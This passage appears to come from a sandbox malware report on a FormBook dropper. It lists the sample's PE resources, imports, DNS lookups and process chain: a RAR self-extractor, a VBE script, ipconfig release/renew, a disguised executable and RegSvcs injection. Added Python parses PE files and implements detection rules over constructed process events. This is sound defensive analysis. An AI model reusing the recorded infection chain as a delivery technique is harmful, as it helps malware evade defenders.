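    machine, nsections, _, _, _, opt_size, _ = COFF_HDR.unpack_from(data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    # PE32 keeps NumberOfRvaAndSizes at +92 and the directories at +96; PE32+ at +108/+112
    ndirs_off, dirs_off = (92, 96) if magic == 0x10B else (108, 112)
    ndirs = struct.unpack_from("<I", data, opt_off + ndirs_off)[0]
    directories = []
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, opt_off + dirs_off + 8 * i)
        directories.append((DIRECTORY_NAMES[i], rva, size))
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, *_, chars = SECTION_HDR.unpack_from(
            data, opt_off + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr,
            "characteristics": chars,
            "entropy": shannon_entropy(data[rawptr:rawptr + rawsize]),
        })
    return {"machine": machine, "directories": directories, "sections": sections}

def rva_to_section(sections, rva):
    """Section mapping `rva` (the report's 'Is in Section' column), or None."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None

def locate_directories(pe) -> dict:
    """Section of every non-empty directory.  SECURITY is skipped on purpose: its
    value is a raw file offset to the Authenticode certificate table, not an RVA."""
    return {name: rva_to_section(pe["sections"], rva)
            for name, rva, _ in pe["directories"] if rva and name != "SECURITY"}

def overlay(data: bytes, pe) -> bytes:
    """Bytes after the last section's raw data, where SFX stubs keep their archive."""
    end = max((s["rawptr"] + s["rawsize"] for s in pe["sections"]), default=0)
    return data[end:]

def overlay_is_rar(blob: bytes) -> bool:
    return blob.startswith(RAR_MAGICS)

def build_test_pe(tail: bytes) -> bytes:
    """Constructed minimal PE32 (test input, not the analysed sample): three 0x200-byte
    sections at file offsets 0x400/0x600/0x800, IMPORT in .rdata, RESOURCE in .rsrc."""
    opt = bytearray(224)                                     # PE32 optional header, 16 dirs
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 92, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x3000, 0x50)   # IMPORT   -> .rdata
    struct.pack_into("<II", opt, 96 + 8 * 2, 0x4000, 0x100)  # RESOURCE -> .rsrc
    layout = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, flags, raw
        (b".text",  0x1000, 0x1000, 0x200, 0x400, 0x60000020, b"\x90" * 0x200),
        (b".rdata", 0x2000, 0x2000, 0x200, 0x600, 0x40000040, b"\x00" * 0x200),
        (b".rsrc",  0x1000, 0x4000, 0x200, 0x800, 0x40000040, bytes(range(256)) * 2),
    ]
    image = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0"
    image += COFF_HDR.pack(0x14C, len(layout), 0, 0, 0, len(opt), 0x102) + bytes(opt)
    for name, vsize, va, rawsize, rawptr, chars, _ in layout:
        image += SECTION_HDR.pack(name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)
    return image.ljust(0x400, b"\0") + b"".join(raw for *_, raw in layout) + tail
```

To run it on the real sample, pass the file's bytes to parse_pe() and overlay() in place of build_test_pe(). Entropy on its own is not diagnostic: the 7.36 of .rsrc here is largely explained by the embedded PNG resources in the table below (ZLIB complexity close to 1.0, i.e. already deflate-compressed), so the overlay size and its signature are the more useful indicators of a carrier executable.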
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x58704 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x5924c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x5a7f8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | | | 0.374390243902439
RT_ICON | 0x5ae60 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | | | 0.4435483870967742
RT_ICON | 0x5b148 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | | | 0.5608108108108109
RT_ICON | 0x5b270 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.6396588486140725
RT_ICON | 0x5c118 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.7256317689530686
RT_ICON | 0x5c9c0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.4624277456647399
RT_ICON | 0x5cf28 | 0xcdff | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9972693656964066
RT_ICON | 0x69d28 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.5239626556016598
RT_ICON | 0x6c2d0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.6015478424015009
RT_ICON | 0x6d378 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.7783687943262412
RT_DIALOG | 0x6d7e0 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x6da68 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x6dba4 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x6dc90 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6ddc0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6e0f8 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x6e34c | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x6e530 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x6e6fc | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x6e8b4 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x6e9fc | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x6ee68 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x6efd0 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x6f124 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x6f230 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x6f2ec | 0x1c0 | data | English | United States | 0.5178571428571429
RT_STRING | 0x6f4ac | 0x250 | data | English | United States | 0.44256756756756754
RT_GROUP_ICON | 0x6f6fc | 0x92 | data | | | 0.6438356164383562
RT_MANIFEST | 0x6f790 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 19:01:53.145333052 CET | 1.1.1.1 | 192.168.2.9 | 0xbaca | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 19:01:53.145333052 CET | 1.1.1.1 | 192.168.2.9 | 0xbaca | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false


                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:13:01:56
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\FX6KTgnipP.exe"
                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                          File size:1'330'396 bytes
                                                                                                                                                                          MD5 hash:09AC9EAE3546E42F6BBCC605242133D0
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true
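The parent/child pair recorded in this process list, the SFX stub run from the Desktop (Target 0 above) spawning wscript.exe on C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe (Target 2 below), is the dropper pattern a process-creation detection should catch. The following is an added example, not Joe Sandbox or Sigma code: it classifies Sysmon-style process-creation events (parent image, image, command line) and escalates when the script argument lives in a WinRAR SFX extraction directory. The event list is constructed for the self-test; its first entry reproduces the launch from this report, the others are made-up benign or borderline cases. Only the RarSFX naming is matched; other SFX stubs would need their own patterns, which is an assumption left to extend.

```python
"""Flag script hosts launched on a script that an SFX stub has just extracted.
Added example, not Joe Sandbox or Sigma code.  EVENTS holds the wscript.exe
launch from this report plus constructed events; nothing is read from disk."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_EXTS = (".vbe", ".vbs", ".js", ".jse", ".wsf", ".hta")
# WinRAR SFX extracts to %TEMP%\RarSFX<N>.  Other stubs use other names; extend the
# pattern as needed (assumption: only the WinRAR naming is covered here).
SFX_DIR = re.compile(r"\\AppData\\Local\\Temp\\RarSFX\d+\\", re.IGNORECASE)
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the created process image
    command_line: str


def script_argument(command_line: str):
    """First quoted or bare token that ends in a script extension, or None."""
    for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', command_line):
        token = quoted or bare
        if token.lower().endswith(SCRIPT_EXTS):
            return token
    return None


def classify(ev: ProcessEvent):
    """(rule, severity) for a suspicious script-host launch, else None.  Match on the
    image basename: under WoW64 the image is SysWOW64\\wscript.exe while the command
    line still says System32, exactly as in this report."""
    if ev.image.rsplit("\\", 1)[-1].lower() not in SCRIPT_HOSTS:
        return None
    script = script_argument(ev.command_line)
    if script is None:
        return None
    if SFX_DIR.search(script):
        return ("script host launched on SFX-extracted script", "high")
    if USER_TEMP.search(script):
        parent_is_system = ev.parent_image.lower().startswith("c:\\windows\\")
        return ("script host launched on user-temp script", "medium" if parent_is_system else "high")
    return None


def triage(events):
    """Every flagged event as (command_line, rule, severity)."""
    return [(ev.command_line, *hit) for ev in events if (hit := classify(ev))]


EVENTS = [
    # From the report: the SFX stub on the Desktop (Target 0) spawns wscript.exe (Target 2)
    ProcessEvent(r"C:\Users\user\Desktop\FX6KTgnipP.exe", r"C:\Windows\SysWOW64\wscript.exe",
                 r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe"'),
    # Constructed: admin script from a non-temp path, launched by the shell
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
                 r'"C:\Windows\System32\WScript.exe" "C:\Scripts\inventory.vbs"'),
    # Constructed: a child of the same parent that is not a script host
    ProcessEvent(r"C:\Users\user\Desktop\FX6KTgnipP.exe", r"C:\Windows\SysWOW64\ipconfig.exe",
                 "ipconfig /all"),
    # Constructed: user-temp script with a Windows binary as parent
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\Users\user\AppData\Local\Temp\setup.vbs"),
]
```

triage(EVENTS) returns two hits: the RarSFX0 launch at high severity and the constructed user-temp case at medium. The parent check matters in practice: a script host whose parent is itself a user-writable executable, as here, deserves the higher severity even without the SFX path.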

Target ID: 2
Start time: 13:02:01
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe"
Imagebase: 0xe00000
File size: 147'456 bytes
MD5 hash: FF00E0480075B095948000BDC66E81F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 13:02:11
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c ipconfig /release
Imagebase: 0xc50000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 13:02:11
Start date: 05/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 13:02:11
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin
Imagebase: 0xc50000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 13:02:11
Start date: 05/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 13:02:11
Start date: 05/12/2024
Path: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
Wow64 process (32bit): true
Commandline: dmqiuorkt.mp2 tdggoffi.bin
Imagebase: 0x850000
File size: 947'288 bytes
MD5 hash: 0ADB9B817F1DF7807576C2D7068DD931
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 8
Start time: 13:02:11
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: ipconfig /release
Imagebase: 0x620000
File size: 29'184 bytes
MD5 hash: 3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 10
Start time: 13:02:14
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Imagebase: 0xc50000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 13:02:14
Start date: 05/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 13:02:14
Start date: 05/12/2024
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: ipconfig /renew
Imagebase: 0x620000
File size: 29'184 bytes
MD5 hash: 3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 13
Start time: 13:02:21
Start date: 05/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase: 0x320000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true
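
The process records above describe a chain a detection engineer would want to turn into hunting logic: a self-extracting archive unpacking to %TEMP%\RarSFX0, WScript.exe executing isci.vbe from that folder, cmd /c wrappers around `ipconfig /release` and `ipconfig /renew`, a file with a .mp2 extension (dmqiuorkt.mp2) being run as a process with tdggoffi.bin as its argument, and RegSvcs.exe started with no assembly to register. The script below is an added example, not part of the Joe Sandbox report: it encodes those four behaviours as rules over process-creation events and runs them on a constructed event list modelled on the records above. The PIDs, the parent links (this section does not reproduce the report's process tree) and the benign control rows are assumptions; real Sysmon Event ID 1 or Security 4688 records can be mapped onto the same ProcEvent fields.

```python
"""Process-creation detection rules modelled on the process list above.
Added example (not Joe Sandbox output); PIDs, parent links and the benign
control rows in SAMPLE_EVENTS are constructed assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbe", ".vbs", ".js", ".jse", ".wsf", ".wsh", ".hta")
EXEC_EXTS = (".exe", ".com", ".scr", ".pif")
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executed image (Sysmon EID 1 "Image")
    cmdline: str   # raw command line (Sysmon EID 1 "CommandLine")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def argv(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def rule_script_host_from_temp(ev: ProcEvent) -> bool:
    """wscript/cscript running a script stored under a Temp folder (isci.vbe above)."""
    if basename(ev.image) not in SCRIPT_HOSTS:
        return False
    return any(t.lower().endswith(SCRIPT_EXTS) and any(m in t.lower() for m in TEMP_MARKERS)
               for t in argv(ev.cmdline)[1:])


def rule_non_exe_image(ev: ProcEvent) -> bool:
    """Image without an executable extension (dmqiuorkt.mp2 above, run via cmd /c)."""
    return not basename(ev.image).endswith(EXEC_EXTS)


def rule_regsvcs_without_assembly(ev: ProcEvent) -> bool:
    """RegSvcs.exe with no assembly argument: nothing legitimate to register,
    typical of a process spawned only to host injected code."""
    return basename(ev.image) == "regsvcs.exe" and len(argv(ev.cmdline)) == 1


def rule_ipconfig_release_renew(events: List[ProcEvent]) -> List[int]:
    """PIDs of the nearest non-cmd ancestor under which both `ipconfig /release`
    and `ipconfig /renew` ran, correlating the separate `cmd /c` launches above."""
    by_pid = {e.pid: e for e in events}
    verbs_by_ancestor: Dict[int, Set[str]] = {}
    for ev in events:
        if basename(ev.image) != "ipconfig.exe":
            continue
        anc: Optional[ProcEvent] = by_pid.get(ev.ppid)
        while anc is not None and basename(anc.image) == "cmd.exe":   # skip cmd /c wrappers
            anc = by_pid.get(anc.ppid)
        if anc is None:
            continue
        verbs = {t.lower() for t in argv(ev.cmdline)[1:] if t.startswith("/")}
        verbs_by_ancestor.setdefault(anc.pid, set()).update(verbs)
    return sorted(p for p, v in verbs_by_ancestor.items() if {"/release", "/renew"} <= v)


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Run every rule; returns sorted (rule_name, pid) pairs."""
    hits: List[Tuple[str, int]] = []
    for ev in events:
        if rule_script_host_from_temp(ev):
            hits.append(("script_host_from_temp", ev.pid))
        if rule_non_exe_image(ev):
            hits.append(("non_exe_image_extension", ev.pid))
        if rule_regsvcs_without_assembly(ev):
            hits.append(("regsvcs_without_assembly", ev.pid))
    hits += [("ipconfig_release_renew", p) for p in rule_ipconfig_release_renew(events)]
    return sorted(hits)


# Constructed sample: the reported chain (PIDs and parents assumed) plus benign controls.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Users\user\Desktop\FX6KTgnipP.exe", r'"C:\Users\user\Desktop\FX6KTgnipP.exe"'),
    ProcEvent(200, 100, r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe"'),
    ProcEvent(300, 200, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ipconfig /release'),
    ProcEvent(500, 200, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin'),
    ProcEvent(700, 500, r"C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2", "dmqiuorkt.mp2 tdggoffi.bin"),
    ProcEvent(800, 300, r"C:\Windows\SysWOW64\ipconfig.exe", "ipconfig /release"),
    ProcEvent(1000, 200, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ipconfig /renew'),
    ProcEvent(1200, 1000, r"C:\Windows\SysWOW64\ipconfig.exe", "ipconfig /renew"),
    ProcEvent(1400, 700, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    # benign controls (constructed): plain ipconfig, RegSvcs registering a real assembly, vendor script
    ProcEvent(2000, 1, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ipconfig /all'),
    ProcEvent(2100, 2000, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ProcEvent(2300, 1, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" "C:\Program Files\Vendor\Comp.dll"'),
    ProcEvent(2400, 1, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Program Files\Vendor\update.vbs"'),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:26s} pid={pid}")
```

Only the four constructed events mirroring the report fire; the benign rows do not, because the `ipconfig /all` pair has no matching release/renew partner, the second RegSvcs.exe carries an assembly path, and the vendor script does not live under a Temp folder. The release/renew rule walks up through cmd.exe parents so that `cmd /c` wrappers, which the report shows between the script host and each ipconfig.exe, do not break the correlation.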

Target ID: 14
Start time: 13:02:21
Start date: 05/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase: 0xf60000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:15
                                                                                                                                                                          Start time:13:02:29
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                                                                                                                                                                          Imagebase:0x330000
                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                          MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:16
                                                                                                                                                                          Start time:13:02:38
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x720000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:17
                                                                                                                                                                          Start time:13:02:38
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x8d0000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:18
                                                                                                                                                                          Start time:13:02:44
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                                                                                                                                                                          Imagebase:0x330000
                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                          MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Has exited:true

